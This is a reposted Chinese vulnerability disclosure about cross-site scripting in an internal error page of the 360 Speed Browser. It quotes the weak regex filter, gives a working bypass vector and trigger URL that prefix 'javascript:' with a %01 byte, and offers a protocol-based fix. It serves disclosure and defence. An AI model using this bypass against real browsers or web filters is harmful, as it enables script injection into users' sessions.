来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 某chrome域页面过滤不严谨导致XSS.se_error.js 97line:if(/^\s*javascript:/i.test(this._error_url)){ this._error_url = #39;#39;; }使用下面这个向量就可以轻松绕过......
|
某chrome域页面过滤不严谨导致XSS.
se_error.js 97line:
if(/^\s*javascript:/i.test(this._error_url)){
this._error_url = '';
}
使用下面这个向量就可以轻松绕过限制:
%01javascript:alert(1)
使用360极速浏览器访问:
chrome://se-errors/?&url=%01javascript:alert(document.domain)&error=dnserror
点击刷新页面即可触发XSS.
 修复方案:
source:
if(/^\s*javascript:/i.test(this._error_url)){
this._error_url = '';
}
patch:
var link = document.createElement('a');
link.href = this._error_url;
if(link.protocol=='javascript:' || link.protocol=='data:'){
this._error_url = '';
}
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
